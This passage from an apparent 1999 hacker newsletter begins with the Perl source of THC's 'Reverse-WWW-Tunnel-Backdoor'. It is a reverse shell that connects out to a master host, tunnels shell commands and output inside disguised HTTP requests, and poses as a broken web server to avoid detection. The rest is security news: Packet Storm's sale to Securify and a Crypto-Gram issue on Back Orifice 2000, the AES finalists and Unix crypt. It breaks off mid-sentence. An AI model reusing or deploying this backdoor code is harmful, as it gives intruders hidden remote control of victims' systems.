option : this help\n"; print STDOUT "any other option : slave mode\n"; exit(0); } else { print STDOUT "starting in slave mode\n"; $SLAVE_MODE = "yeah"; } } if (! $SLAVE_MODE) { &master; } else { &slave; } # END OF MAIN FUNCTION ############### SLAVE FUNCTION ############### sub slave { $pid = 0; if ($PROXY) { # setting the real config (for Proxy Support) $REAL_SERVER = $PROXY; $REAL_PORT = $PROXY_PORT; $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT . $CGI_PREFIX; } else { $REAL_SERVER = $SERVER; $REAL_PORT = $LISTEN_PORT; $REAL_PREFIX = "GET " . $CGI_PREFIX; } AGAIN: if ($pid) { kill 9, $pid; } if ($TIME) { # wait until the specified $TIME $TIME =~ s/^0//; $TIME =~ s/:0/:/; (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" . $min; while ($TIME ne $t) { sleep(28); # every 28 seconds we look at the watch (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" .$min; } } if ($DAILY) { # if we must connect daily, we if (fork) { # we fork the daily shell process sleep(69); # to ensure the master control proc. goto AGAIN; # won't get stuck by a fucking cmd } # the user executed. } $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; $remote = sockaddr_in($REAL_PORT, $address); $forked = 0; GO: close(THC); socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); if (! $forked) { # fork failed? fuck, let's try again pipe R_IN, W_IN; select W_IN; $|=1; pipe R_OUT, W_OUT; select W_OUT; $|=1; $pid = fork; if (! defined $pid) { close THC; close R_IN; close W_IN; close R_OUT; close W_OUT; goto GO; } $forked = 1; } if (! $pid) { # this is the child process (execs $SHELL) close R_OUT; close W_IN; close THC; open STDIN, "<&R_IN"; open STDOUT, ">&W_OUT"; open STDERR, ">&W_OUT"; exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; close R_IN; close W_OUT; exit(0); } else { # this is the parent (data control + network) close R_IN; sleep($DELAY); # we wait $DELAY for the commands to complete vec($rs, fileno(R_OUT), 1) = 1; select($r = $rs, undef, undef, 30); sleep(1); $output = ""; vec($ws, fileno(W_OUT), 1) = 1; while (select($w = $ws, undef, undef, 1)) { read R_OUT, $readout, 1 || last; $output = $output . $readout; } print W_OUT "\000" || goto END; while (1) { read R_OUT, $readout, 1 || last; last if ($readout eq "\000"); $output = $output . $readout; } &uuencode; # does the encoding of the shell output $encoded = $REAL_PREFIX . $encoded . "\n"; connect(THC, $remote) || goto END; # connect to master send (THC, $encoded, 0) || goto END; # and send data $input = ""; vec($rt, fileno(THC), 1) = 1; # wait until master sends reply while (! select($r = $rt, undef, undef, 0.00001)) {} while (1) { # read until EOD (End Of Data) recv (THC, $readin, 1, 0) || goto OK; goto OK if (($readin eq "\000") or ($readin eq "\n") or ($readin eq "")); $input = $input . $readin; } OK: $input =~ s/\n//gs; &uudecode; # decoding the data from the master goto END if ( $decoded =~ m/^$PASSWORD/s == 0); $decoded =~ s/^$PASSWORD//; print W_IN "$decoded" || goto END; # sending the data sleep(1); # to the shell proc. goto GO; } END: kill 9, $pid; $pid = 0; exit(0); } # END OF SLAVE FUNCTION ############### MASTER FUNCTION ############### sub master { socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; listen(THC, 3) || die "can't listen\n"; # print the HELP print STDOUT ' Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ... Introduction: Wait for your SLAVE to connect, examine it\'s output and then type in your commands to execute on SLAVE. You\'ll have to wait min. the set $DELAY seconds before you get the output and can execute the next stuff. Use ";" for multiple commands. Trying to execute interactive commands may give you headache so beware. Your SLAVE may hang until the daily connect try (if set - otherwise you lost). You also shouldn\'t try to view a binary data too ;-) "echo bla >> file", "cat >> file <<- EOF", sed etc. are your friends if you don\'t like using vi in a delayed line mode ;-) To exit this program on any time without doing harm to either MASTER or SLAVE just press Control-C. Now have fun. '; YOP: print STDOUT "\nWaiting for connect ..."; $remote=accept (S, THC) || goto YOP; # get the connection ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE $slave=gethostbyaddr($r_slave, AF_INET); # data. $slave="unresolved" if ($slave eq ""); print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; select S; $|=1; select STDOUT; $|=1; $input = ""; vec($socks, fileno(S), 1) = 1; while (1) { # read the data sent by the slave while (! select($r = $socks, undef, undef, 0.00001)) {} recv (S, $readin, 80, 0) || print STDOUT "disconnected\n"; $readin =~ s/\r//g; $input = $input . $readin; last if ( $input =~ m/\n\n/s ); } &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); $input =~ s/^.*($CGI_PREFIX)\??//s; $input =~ s/\n.*$//s; &uudecode; # decoding the data from the slave &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); $decoded =~ s/^$PASSWORD//s; $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); print STDOUT "$decoded"; # showing the slave output to the user $output = ; # and get his input. &uuencode; # encode the data for the slave send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it close (S); print STDOUT "sent.\n"; goto YOP; # wait for the next connect from the slave } # END OF MASTER FUNCTION ###################### MISC. FUNCTIONS ##################### sub uuencode { # does the encoding stuff for error-free data transfer via WWW $output = $PASSWORD . $output; # PW is for error checking and $uuencoded = pack "u", "$output"; # preventing sysadmins from $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird /'zcadefghjklmnopqrstuv' # data. No real /; # security! $uuencoded =~ tr/"'"/'b'/; if ( ($PROXY) && ($SLAVE_MODE) ) {# a proxy drops the request if > 8kb $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; $cut_length = 4099 - (length $REAL_PREFIX); $uuencoded = pack "a$cut_length", $uuencoded if ($codelength > 4111); } $encoded = $uuencoded; $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); } # END OF UUENCODE FUNCTION sub uudecode { # does the decoding of the data stream $input =~ tr/'zcadefghjklmnopqrstuv' /'\n)=(:;&><,#$*%]!\@"`\\\-' /; $input =~ tr/'b'/"'"/; $decoded = unpack "u", "$input"; } # END OF UUDECODE FUNCTION sub hide_as_broken_webserver { # invalid request -> look like broken server send (S, "\n404 File Not Found\n". "\n

File Not Found

\n\n", 0); close S; print STDOUT "Warning! Illegal server access!\n"; # report to user goto YOP; } # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION # END OF PROGRAM # (c) 1998 by <--> ----[ EOF --- CUT HERE --- Ciao... van Hauser / THC - [The Hacker's Choice] THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- @HWA 08.0 PacketStorm Security Sells Out? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Who's going to pick up the slack now that Ken has removed himself from affiliation with Packet Storm? the following sounds well and good but will this company (Securify) have the same contacts and receive updates as frequently as Ken used to? I doubt it...well it looks like PSS will be relegated to being just an archive of old security tools and exploits hopefully the new system will at least do the old one some justice and preserve the layout meanwhile we wish Ken WIlliams the best of luck in his new job whatever that may be.... - Ed From HNN http://www.hackernews.com Packet Storm Moves to Kroll-O'Gara contributed by jkw As mentioned in the HNN rumors section last week Ken Williams has sold the rights to Packet Storm Security to Securify, the Information Security Group of The Kroll-O'Gara Company. Ken Williams will no longer be running the site and has accepted a different job within the Information Security industry. Securify hopes to have the site operational and online sometime in September. Old PSS - With Letter from Ken Williams and Securify Press Release New PSS http://www.securify.com/packetstorm/ Late Update Wow, this made it into the New York Times. NY Times - Registration Required http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html August 17, 1999 Security Firm to Revive Computer-Defense Site By PETER WAYNER roll-O'Gara, the international security consulting firm, said Monday it would take over an Internet site that not only posted information about defending computer systems against attacks but also told how to break into them. In the shadowy world of hackers and crackers, it is often hard to tell the good guys from the bad. Computer-security experts frequently test systems by breaking into them, and the site, Packet Storm, posted descriptios of those break-ins. Kroll-O'Gara's computer security unit, Securify, which declined to discuss financial terms of its acquisition, said it planned to maintain the site's tradition of high-quality information as a way to market its services. But Kroll-O'Gara executives said that it would rid the site of its more contentious publications. "We see it, from a corporate standpoint, as somewhat risky and controversial," Charles Breed, Securify's vice president for marketing, acknowledged. "We'll be publishing a site with very powerful tools and they can be used for good or evil. Our opinion is that it's better to make knowledge available than keeping it obscure or hidden." Tommy Ward, a project manager at Securify, said three Securify employees would comb through the site, "sanitizing content." Until late June, Harvard University provided Packet Storm as a service and picked up the costs of answering requests for more than 10 gigabytes of data traffic a day. The site, which was edited by Ken Williams, a security consultant not associated with the university, proved popular with many computer experts because it collected detailed technical information about the methods intruders use to exploit weaknesses in computers. These often-fascinating narratives were mixed with discussions about how to help systems withstand assault. Harvard dropped the site in late June after the host of a rival site complained that Packet Storm had posted defamatory information. Joe Wrinn, a university spokesman, said, "We're happy that the site will be online again. That's the original reason we got involved." Williams called the site "a labor of love," but said it was taking 60 to 80 hours a week to maintain. He will not be associated with the site, which will be run by Securify employees at Securify.com. Since Harvard pulled the plug, the site has been inaccessible; computer professionals looked forward to its relaunch, expected in late September. "I'm glad that the compendium of information is going to be preserved," said Adam Shostack, a computer security consultant. -=- Here's the index.html file from the original location of PacketStorm Security with Ken's message and the Securify press release... -=- http://www.genocide2600.com/~tattooman/index.html To The Supporters of Packet Storm Security: As you may already be aware, there have been numerous rumors on the Net recently regarding the revival of Packet Storm Security through corporate sponsorship. I am pleased to announce that the rumours are indeed true, and that Packet Storm will now be hosted by Securify, the Information Security Group of Kroll-O'Gara. I have carefully considered the direction and future of PSS since it was taken down by Harvard, and have entertained innumerable offers from a wide variety of corporate, non-profit, and private entities to host the site. Kroll-O'Gara has presented me with the most impressive vision and plans for PSS. Not only does Kroll-O'Gara intend to preserve the original ideals and intent of PSS, but they have developed an exciting and definitive roadmap for the logical evolution of the site. Packet Storm Security had reached a stage where it was much more than a full time job for one person. For the last year I have been working a minimum of 60 hours a week to maintain the high quality of the site. In order to sustain my vision of PSS as *the* resource on the Internet for freeware Information Security tools, it became necessary to acquire the resources that only a dedicated corporate sponsor could provide. I have talked at length with Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I believe that they have grand and noble goals for the future of Packet Storm Security. Unfortunately, I will not be with PSS in the future, however, because I have recently accepted an extremely enticing offer elsewhere in the Information Security industry. I do, nevertheless, give my strongest support to the new maintainers of the site, and I'm excited about what's in store for the future of PSS. To all of my valued friends and supporters of the site: I sincerely hope that you too will continue through your contributions and suggestions to help make Packet Storm what it was! Your support has been and will continue to be invaluable in ensuring that PSS is *the* resource for freeware Information Security tools. Respectfully, Ken Williams Founder Packet Storm Security ********** PRESS RELEASE ********** For more information, contact: Vicky Wu Charles Breed PR Manager VP of Marketing KVO Public Relations Securify, Kroll-O'Gara Company (650) 919-2027 (650) 812-9400 x107 vicky_ku@kvo.com cbreed@securify.com Matt Barrie matt@securify.com packetstorm@securify.com KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER WEB SITE FOR INFORMATION SECURITY TOOLS & DATA Packet Storm Security is positioned to be the Internet's largest single source for computer security threat information, tools and patches PALO ALTO, Calif., August, 17, 1999 In response to the growing demand for current and accurate information and tools on computer security, Securify, the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG), announced today the acquisition of Packet Storm Security; a website created and maintained by Ken Williams, a renowned computer security expert. Averaging over 400,000 hits per day, generating over 7 gigabytes of traffic, Packet Storm Security is an established resource for many government agencies and major corporations. "Packet Storm Security provides a strong, long term Internet presence for Securify," states Dr. Taher Elgamal, President of Securify. "It is a state of the art resource for our customers and we see it as the nucleus for a number of exciting additional security management services." Packet Storm is one of the largest and most well recognized information security resources on the Internet today. The site consists of over 45,000 security related programs, such as up to date tools, patches, advisories, vulnerabilities. Considering this massive repository of information, Packet Storm Security is the ideal site for finding up-to-date information on the latest threats that face corporate networks and computer systems. This site has been frequented by system administrators, engineers, programmers, from organizations such as AT&T, DoD, NSA, FBI, IBM, Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST, USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank. "Our customers have asked for a single source data point to inform and educate them on the ever increasing number of information security threats," states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We will be dedicating a significant effort to making this site extremely useful for anyone involved with computer security." Packet Storm Security is in the process of being updated and refined prior to being posted in September at http://www.securify.com/packetstorm # # # About Securify, the Information Security Group of Kroll-O'Gara Securify, the Information Security Group of Kroll-O^Gara is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. These services include network and system security review and repair, product assessment, the creation and implementation of secure e-commerce sites, architecture and design. They also employ internally developed proprietary software that combines best-of-breed security tools and client information to analyze and assess network security issues as a scientific discipline. Their approach employs standard, well-tested methodology, and treats security as both a business and a technical issue. The Information Security Group is unique in the security field in that it not only provides the assessment and recommendations, but also actual implementation and deployment. For more information, please access their web site at www.securify.com, or contact the company at (650) 812-9400. Contact Vicki Wu of KVO Public Relations at (650) 919-2027. About The Kroll-O'Gara Company The Kroll-O'Gara Company is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, business, and individuals with information, analysis, training, and products to mitigate the growing risks associated with white-collar crimes, fraud, physical attacks, threats of violence, and uninformed decisions based upon incomplete or inaccurate information. The company is organized into four primary business groups: Investigations & Intelligence Group, Security Products & Services Group, Voice and Data Security Group, and the Information Security Group. Based in New York City, New York, and Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices and plants around the world. For more information, please access the company's web sites at www.securify.com or www.kroll-ogara.com. @HWA 09.0 CryptoGram Aug 15th '99 ~~~~~~~~~~~~~~~~~~~~~~~ From: Bruce Schneier CRYPTO-GRAM August 15, 1999 by Bruce Schneier Founder and CTO Counterpane Internet Security, Inc. schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 1999 by Bruce Schneier CRYPTO-GRAM now has over 20,000 subscribers! ** *** ***** ******* *********** ************* In this issue: Back Orifice 2000 Counterpane -- Featured Research News Counterpane Systems News NIST AES News The Doghouse: HPUX and the UNIX Crypt Algorithm Web-Based Encrypted E-Mail Comments from Readers ** *** ***** ******* *********** ************* Back Orifice 2000 Back Orifice is a free remote administration tool for Microsoft Windows. It's also one of the coolest hacking tools ever developed. Originally released last July, Back Orifice 2000 (BO2K) is the current release of the software. It works on Windows 95, Windows 98, and Windows NT. It is much better written than the original Back Orifice. And it's free, and open source. There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the same thing. They allow a network administrator to remotely troubleshoot a computer. They allow a remote tech support person to diagnose problems. They are mandatory in many corporate computing environments. Remote administration tools also have a dark side. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC. Back Orifice's difference is primarily marketing spin. Since it is not distributed by a respectable company, it cannot be trusted. Since it was written by hackers, it is evil. Since its malicious uses are talked about more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Well, not exactly. Back Orifice was designed by a bunch of hackers with fun in mind. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes (and passwords). And there is an extensible plug-in language for others to write modules. (I'm waiting for someone to write a module that automatically sniffs for, and records, PGP private keys.) Back Orifice is also designed to hide itself from the server's owner. Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. (Other remote administration tools, even SMS, also have stealth modes; Back Orifice is just better at it.) Anti-virus software has been updated to detect default Back Orifice configurations, but that will only solve most of the problem. Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different...I doubt that all variants will ever be discovered. Okay, so who's to blame here? The Cult of the Dead Cow wrote and released Back Orifice. Surely the world is not a safer place because, as CDC's Sir Dystic put it: "every 14-year-old who wants to be a hacker will try it." BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good. On the other hand, Back Orifice can't do anything until the server portion is installed on some victim's computer. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard: lots of people network their computers to the Internet without adequate protection. An attacker can even ask the victim to install Back Orifice (social engineering might help); the Worm.ExploreZip worm of this spring did exactly that. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice. But what about Microsoft's computing environment? One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. Any program that runs in Microsoft Windows 95 and 98 can do anything. In Unix, an attacker would first have to get root privileges. Not in Windows. There's no such thing as limited privileges, or administrator privileges, or root privileges. Microsoft assumes that anyone who can run a program can reformat the hard drive. This might have made some sense in the age of isolated desktop computers; after all, if you could run a program, you were standing in front of the machine. But on the Internet, this is absurd. Windows NT was designed as a secure operating system, more or less. There are provisions to make Windows NT a very secure operating system, such as privilege levels in separate user accounts, file permissions, and kernel object access control lists. However, the configuration that makes Windows NT secure is very very far and distant from the default installed configuration. Microsoft admits this. You have to make 300+ security checks and modifications to Windows NT to make it secure in its default configuration. And on top of this, Microsoft assumes that most users have Administrator access to their desktop machines anyway. They only really worry about network security, not host-end security, which is where they are seriously vulnerable to attacks like Back Orifice 2000. Windows NT could be secure, but Microsoft refuses to ship the OS in that condition (presumably they worry that their spiffy animated fading menu bars may be overlooked). Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. Maybe the world would have been safer had they not demonstrated the danger so graphically, but I am not sure. There are certainly other similar tools in the hacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. And Microsoft only responds to security threats if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice, and suddenly they take the vulnerability seriously. Back Orifice Home Page: http://www.bo2k.com/ Commentary: http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm Microsoft's Systems Management Server: http://www.microsoft.com/smsmgmt/techdetails/remote.asp http://www.cultdeadcow.com/news/pr19990719.html BackDoor-G: http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html ** *** ***** ******* *********** ************* Counterpane -- Featured Research "Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom Number Generator" J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected Areas in Cryptography, Springer Verlag, August 1999, to appear. We describe the design of Yarrow, a family of cryptographic pseudo-random number generators (PRNG). We describe the concept of a PRNG as a separate cryptographic primitive, and the design principles used to develop Yarrow. We then discuss the ways that PRNGs can fail in practice, which motivates our discussion of the components of Yarrow and how they make Yarrow secure. Next, we define a specific instance of a PRNG in the Yarrow family that makes use of available technology today. http://www.counterpane.com/yarrow-notes.html ** *** ***** ******* *********** ************* News Major irony alert: President Clinton signs a bill into law using PGP. http://www.wired.com/news/news/politics/story/20775.html A new U.K. bill on e-commerce has the nasty provision that police will be able to demand access to encryption keys if they suspect criminal use of the Internet. Those who refuse get a two-year prison sentence. http://www.wired.com/news/news/politics/story/20937.html http://techweb.com/news/story/TWB19990726S0010 Text of the bill: http://www.dti.gov.uk/cii/elec/ecbill.html Foundation for Internet Policy Research commentary on the bill: http://www.fipr.org/ecommpr.html The first three chapters of Alan Turing's treatise on the Enigma, retyped from the only known paper copy, are available at: http://home.cern.ch/~frode/crypto/Turing/index.html The L0pht has released an anti-sniffer tool. It detects sniffers on networks. Unfortunately, at least one sniffer-detection-resistant sniffer has been released. And the race continues.... http://www.wired.com/news/news/technology/story/20913.html L0pht: http://www.l0pht.com/ The Information Society, an academic journal, published a special issue on anonymity and the Internet: vol. 15, no. 2. Actually, there are interesting articles in most of the back issues. http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html The Encrypting File System (EFS) built into Microsoft Windows 2000 has been broken. http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news Microsoft claims that it has not, that the attack is predicated on the user doing something wrong: leaving the EFS recovery key on the machine. http://www.microsoft.com/security/bulletins/win2kefs.asp The author's reply: http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&I DF=118&TB=news I reserve judgment, not having studied EFS, the attack, or Microsoft's response. In late May, Janet Reno wrote to German Federal Secretary of Justice Herta Daubler-Gmelin, asking him to control the distribution of encryption software over the Internet. http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html There's another version of Melissa floating around. This one uses the ".all" extensions in Microsoft Outlook to crash systems. Clever idea, actually. http://www.computerworld.com/home/print.nsf/all/990719B50A This rather impressive espionage device is being sold as a home consumer item: http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm There has been considerable hoo-hah over a U.S. government plan to monitor private networks for intrusion, and invade a lot of privacy in the process. (This will all be at the consent of the various companies, so warrants are not required.) It's called Fidnet, for Federal Intrusion Detection Network. http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014 http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm http://techweb.com/wire/story/TWB19990729S0013 http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm EPIC's "Critical Infrastructure Protection and the Endangerment of Civil Liberties" http://www.epic.org/security/infowar/epic-cip.html Copy of the White House plan, and commentary: http://www.cdt.org/policy/terrorism/fidnet/ The House Appropriations Committee has approved a $36 billion budget for the departments of Justice, Commerce and State, but included language specifically barring any spending on FIDNET. http://www.techweb.com/wire/story/reuters/REU19990730S0005 And the U.S. government backpedals. http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html AOL has been hit by an ingenious social engineering attack. This hoax message, masquerading as a hoax warning, fools users into giving up account and credit card information. http://www.zdnet.com/zdnn/stories/news/0,4586,2303536,00.html The FBI is preventing CMI Communications, a Canadian company, from offering satellite phone service in the U.S. because the FBI can't eavesdrop on the calls. http://www.nationalpost.com/financialpost.asp?f=990716/29896.html California adopted a new digital signature law, allowing brokerages to use signed e-mail for contracts. http://www.computerworld.com/home/news.nsf/all/9907294dig The case against Kevin Mitnick has finally been dropped. http://www.msnbc.com/news/178825.asp Congressman Porter Goss (R-Fla) wants to offer a tax break to companies that develop encryption products that enable key recovery or other methods of giving the government access to the encryption keys. http://www.wired.com/news/news/politics/story/21014.html A new Excel vulnerability allows a malicious spreadsheet to execute arbitrary code without the user's permission. http://www.securityportal.com/list-archive/bugtraq/1999/Jul/0268.html http://www.zdnet.com/zdnn/stories/news/0,4586,2305495,00.html?chkpt=hpqs014 http://officeupdate.microsoft.com/Articles/mdac_typ.htm The Ontario Information and Privacy Commissioner has published a pamphlet that recommends that anyone using e-mail learn to understand and use encryption. http://www.ipc.on.ca/Web_site.ups/MATTERS/SUM_PAP/PAPERS/encrypt.htm And one last Microsoft item. To help salvage their reputation, Microsoft put a server running a beta of Windows 2000 outside its firewall and dared hackers to break in. The problem was that the server couldn't stay up long enough for anyone to even try. http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html?chkpt=hpqs014 http://www.windows2000test.com/ ** *** ***** ******* *********** ************* Counterpane Systems News Counterpane Systems has changed its name to Counterpane Internet Security, Inc. We have received venture-capital funding from Accel Partners and Bessemer Ventures, and are in the process of creating a series of service offerings in the managed security area. Anyone interested in working for Counterpane in the Bay Area should contact me immediately. Watch this space for more details. This is going to be the coolest security company you've ever seen. PasswordSafe wins PC Magazine editors choice award: http://www.zdnet.com/pcmag/stories/reviews/0,6755,2311193,00.html Bruce Schneier profiled on guru.com: http://www.guru.com/profiles_schneier.html Microsoft PPTP's vulnerability discussed: http://www.zdnet.com/sr/stories/news/0,4538,2293711,00.html Bruce Schneier will be speaking at the Scandinavian Network Expo, in the evening on 14 September and then on 15 September http://www.networkstelecom.com/index_eng.html http://www.firedoor.se/bruce/bruce.var ** *** ***** ******* *********** ************* NIST AES News AES is the Advanced Encryption Standard, the encryption algorithm that will eventually replace DES. In 1997, the U.S. government (NIST, actually), solicited candidate algorithms for this standard. By June 1998 (the submission deadline), NIST received fifteen submissions. NIST asked for comments on these algorithms, with the intention of pruning the list to five finalists. NIST held an AES conference in Rome in April (this was the second AES conference, the first was the previous August in California), the comment deadline was in June, and last Monday NIST announced the finalists. They are: Mars, submitted by a large team at IBM. RC6, from RSA Data Security (including Ron Rivest) Rijndael, from a team of excellent Belgian cryptographers Serpent, by three very respected cryptographers, Ross Anderson, Eli Biham, and Lars Knudsen Twofish, from Counterpane Systems, including myself NIST didn't just announce the five finalists. They published a 52-page report explaining their rationale -- why they chose the algorithms they did and why they did not chose the algorithms they didn't -- and it is worth reading to peek at their decision process. It's at http://csrc.nist.gov/encryption/aes/round2/round2.htm#NIST The next step is to choose among the finalists. NIST is again soliciting comments on the algorithms, and there will be a third AES Candidate Conference in New York in April 2000, held in conjunction with the 7th Fast Software Encryption workshop. Comments are due by 15 May 2000, and then NIST will propose a standard. The AES will then go through the formal government approvals process and become a Federal Information Processing Standard (FIPS), and presumably will become the standard encryption algorithm for all sorts of international applications. Expect all this to happen by the summer of 2001; the government moves slowly. Cryptographers are busily analyzing the submissions for security. It's tempting to think of the process as a big demolition derby: everyone submits their algorithms and then attacks all the others...the last one standing wins. Really, it won't be like that. At the end of the analysis period, I don't expect serious weaknesses to be found in any of the finalists. The winner will be chosen based on other factors: performance, flexibility, suitability. This means that we need your input into this process. I know you're not cryptographers, and you won't be able to comment on the mathematics of the various submissions. But you can comment on your encryption requirements, and whether the algorithms will suit your needs. AES will have to work in a variety of current and future applications, doing all sorts of different encryption tasks: 32-bit microprocessors, 64-bit microprocessors, small 8-bit smart cards, DSPs, FPGAs, custom ASICs, and everything else we can't even imagine yet. Choosing a single algorithm for all these applications is not easy, but that's what we have to do. It might make more sense to have a family of algorithms, each tuned to a particular application, but there will be only one AES. And when AES becomes a standard, customers will want their encryption products to be "buzzword compliant." They'll demand it in hardware, in desktop computer software, on smart cards, in electronic-commerce terminals, and other places we never thought it would be used. Anything we pick for AES has to work in all those applications. So how do you comment? NIST is accepting formal comments either on paper or by email. See http://www.nist.gov/aes for instructions. Be sure to identify who you represent and what cryptography interests you have. Remember, AES is going to be your cryptography standard for the 21st century. We need your help. NIST Round 2 page: http://csrc.nist.gov/encryption/aes/round2/round2.htm FSE 2000: http://www.counterpane.com/fse.html Performance comparison of AES candidates: http://www.counterpane.com/aes-performance.html A version of this essay appears at: http://www.zdnet.com/zdtv/cybercrime/features/story/0,3700,2312895,00.html ** *** ***** ******* *********** ************* The Doghouse: HPUX and the UNIX Crypt Algorithm Here is a comparison of the Solaris and HPUX man pages for the UNIX "crypt" encryption function. Same algorithm, different interpretations, different conclusion. According to the Solaris 2.6 Crypt man page, "crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-element rotor. Methods of attack on such machines are widely known, thus crypt provides minimal security." According to the HPUX10.20 man page, "crypt implements a one-rotor machine designed along the lines of the German 